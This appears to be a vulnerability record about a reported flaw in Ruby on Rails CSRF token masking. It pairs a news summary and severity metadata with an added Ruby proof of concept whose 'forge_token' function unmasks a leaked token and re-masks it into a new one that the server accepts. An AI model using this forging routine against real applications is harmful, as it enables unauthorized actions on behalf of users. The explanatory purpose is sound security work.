On April 26, 2025, security researchers disclosed what they described as a critical flaw in the CSRF protection mechanism of Ruby on Rails, one that effectively nullifies the framework's primary defence against cross-site request forgery. Rails masks each CSRF token by XORing it with a random one-time pad (OTP) and then concatenating the OTP with the XOR-encrypted token. Because the OTP travels alongside the ciphertext, anyone holding a masked token also holds the key needed to recover the underlying raw token and re-mask it into a fresh, valid token, so forged requests pass the check unchallenged. The vulnerability affects every current Rails release and all versions dating back to the 2022/2023 "fix", placing thousands of web applications at risk. An attacker can exploit it to perform unauthorized actions on behalf of authenticated users without their knowledge, such as changing passwords, transferring funds, or exfiltrating sensitive data. The failure of this core security layer threatens customer privacy and opens avenues for large-scale data leakage, fraudulent transactions, and significant reputational damage for organizations relying on Rails. Immediate patching and a redesign of the token-masking scheme are essential to prevent widespread compromise of personal and financial information across the Rails ecosystem.
Source: https://cybersecuritynews.com/ruby-on-rails-vulnerability/
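The masking scheme described above, reimplemented in plain Ruby as an added example (this is not code from the article or from the Rails project itself, although it follows the same OTP || (OTP XOR token) layout). It assumes a 32-byte raw session token, a constructed sample token in place of one drawn from SecureRandom, and a simplified server-side check that compares the unmasked token with the session token; the function names (mask_token, unmask_token, forge_token, server_accepts?) are illustrative.

```ruby
require "securerandom"

# Length of the raw CSRF token kept in the session (32 bytes).
AUTHENTICITY_TOKEN_LENGTH = 32

# Byte-wise XOR of two equal-length binary strings; returns a new string.
def xor_byte_strings(s1, s2)
  out = s2.dup.force_encoding(Encoding::BINARY)
  s1.bytesize.times { |i| out.setbyte(i, s1.getbyte(i) ^ s2.getbyte(i)) }
  out
end

# Masking as rendered into the page / meta tag:
#   masked = base64( OTP || (OTP XOR raw_token) )
# The pad is random per render, which is what defeats BREACH-style
# compression guessing, but it is sent in the clear next to the ciphertext.
def mask_token(raw_token)
  one_time_pad = SecureRandom.random_bytes(AUTHENTICITY_TOKEN_LENGTH)
  encrypted = xor_byte_strings(one_time_pad, raw_token)
  [one_time_pad + encrypted].pack("m0") # strict base64, no newlines
end

# Unmasking: split off the pad and XOR it back out. No secret is needed,
# only the masked token itself.
def unmask_token(masked_token)
  decoded = masked_token.unpack1("m0")
  one_time_pad = decoded[0...AUTHENTICITY_TOKEN_LENGTH]
  encrypted = decoded[AUTHENTICITY_TOKEN_LENGTH..]
  xor_byte_strings(one_time_pad, encrypted)
end

# Simplified server-side verification (assumption: the real check also
# uses a constant-time comparison and per-form token variants).
def server_accepts?(masked_token, session_raw_token)
  unmask_token(masked_token) == session_raw_token
end

# Attacker's move: recover the raw token from any leaked masked token and
# re-mask it under a pad of their own choosing. The result is a different
# string that the server accepts as valid for the victim's session.
def forge_token(leaked_masked_token)
  mask_token(unmask_token(leaked_masked_token))
end

# Constructed sample session token (bytes 0..31); real Rails draws it
# from SecureRandom.
def sample_raw_token
  (0...AUTHENTICITY_TOKEN_LENGTH).to_a.pack("C*")
end

if __FILE__ == $PROGRAM_NAME
  raw = sample_raw_token
  leaked = mask_token(raw)          # token as it appears in the victim's page
  forged = forge_token(leaked)      # attacker-minted token for the same session
  puts "leaked token : #{leaked}"
  puts "forged token : #{forged}"
  puts "forged != leaked : #{forged != leaked}"
  puts "server accepts forged : #{server_accepts?(forged, raw)}"
end
```

Note that `unmask_token` performs exactly the computation the server performs, so recovering the raw token requires nothing beyond a copy of a masked token issued to the victim's session; the practical severity therefore turns on how an attacker obtains that masked token in the first place (a page read via XSS, a leaked response body, a misconfigured CORS policy, and similar channels), since the masking itself adds no secrecy.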
"id": "rub300050125",
"linkid": "ruby-on-rails-org",
"type": "Vulnerability",
"date": "5/2025",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact, including customer data leaks"